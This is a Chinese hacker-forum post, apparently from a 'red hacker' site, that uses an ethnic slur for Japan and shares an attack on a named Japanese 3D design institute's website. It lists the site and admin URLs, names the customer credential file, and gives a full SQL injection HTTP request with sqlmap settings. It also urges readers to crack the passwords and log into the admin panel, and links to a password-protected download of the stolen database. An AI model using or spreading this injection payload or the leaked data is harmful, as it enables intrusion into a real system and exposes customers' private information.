小日本地国某某3D设计研究所整站数据库及SQL注入分享【2024.01.25】

806 1
樱花泪 2024-1-25 20:30:43 | 显示全部楼层 |阅读模式
网站前台地址是:https://tact-3d.link/
网站后台地址是:https://tact-3d.link/admin/
账号密码存储在:dtb_customer.csv
破解出来密码的,可以尝试着登录后台(我就先放弃了)

SQL注入数据包是(sqlmap跑:–level 5 –risk 3):
GET /contact/index.php?contact_product=16/(3*2-5) HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://tact-3d.link/
Cookie: ECSESSID=68862826ce42e9e02f859e9d64d4c05d; fontsize=100; product[0]=16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Host: tact-3d.link
Connection: Keep-alive
数据库下载地址是:
https://52ws.lanzv.com/iKi6u1mai93e
密码:8888

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

樱花泪

初入联盟

关注
  • 2
    主题
  • 0
    粉丝
  • 0
    关注
漂泊天涯回首怀念她眼眸

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2026 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行